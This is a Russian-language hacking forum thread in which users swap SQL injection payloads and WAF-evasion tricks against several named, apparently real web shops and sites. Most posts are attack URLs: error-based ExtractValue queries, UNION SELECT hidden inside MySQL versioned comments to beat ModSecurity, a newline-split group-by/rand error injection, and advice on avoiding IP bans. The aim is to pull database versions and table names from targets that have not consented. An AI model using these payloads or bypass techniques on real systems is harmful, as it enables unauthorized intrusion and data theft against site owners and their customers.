08.12.2014, 03:51
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
есть
Сообщение от None
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,con cat(0x3a,(select(version())))))='1
user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь?
Сообщение от None
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,con cat(0x3a,(select+mid(TAble_NaMe,1,31)+from+informa tion_schema.tables))))='1
PS много запросов не делайте часто, забанит |
|
|
08.12.2014, 23:53
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Br@!ns
есть
user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь?
PS много запросов не делайте часто, забанит
Код:
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),1,31))from(information_schema.tables)))))='1
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),32,63))from(information_schema.tables)))))='1
|
|
|
|
09.12.2014, 04:04
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
как обойти такую WAF?
Код HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+
Код HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+
фильтрует комбинацию union+select и concat |
|
|
|
09.12.2014, 04:49
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Br@!ns
как обойти такую WAF?
Код HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+
Код HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+
фильтрует комбинацию union+select и concat Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.
Код:
/store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
|
|
|
|
09.12.2014, 05:17
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от madhatter
Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.
Код:
/store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
а как дальше вот это обойти можно?
Код HTML:
https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20
|
|
|
|
09.12.2014, 08:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
докручивай через post запрос, там error-based.
 |
|
|
|
14.12.2014, 11:12
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Не получается обойти фильтр на слово information_schema.
/*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?
http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+
сайт банит ip при неудачных попытках
|
|
|
|
14.12.2014, 16:01
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Br@!ns
Не получается обойти фильтр на слово information_schema.
/*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?
http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+
сайт банит ip при неудачных попытках
Щас выложат и завтра уже залепят новый фильтр. А по сути реально способов обойти mod security и подобные WAF не так уж и много и почти все уже в фильтрах.
|
|
|
|
14.12.2014, 20:42
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+g roup+by+left(version(),@:=~@)having+min(0)
|
|
|
|
15.12.2014, 02:12
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Br@!ns
не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+g roup+by+left(version(),@:=~@)having+min(0)
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+or+1+grou p+by+concat((select+table_name+%0A+from+informatio n_schema.tables+limit+1,1),floor(rand(0)*2))having +min(0)
разбиваем запрос переносом строки
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
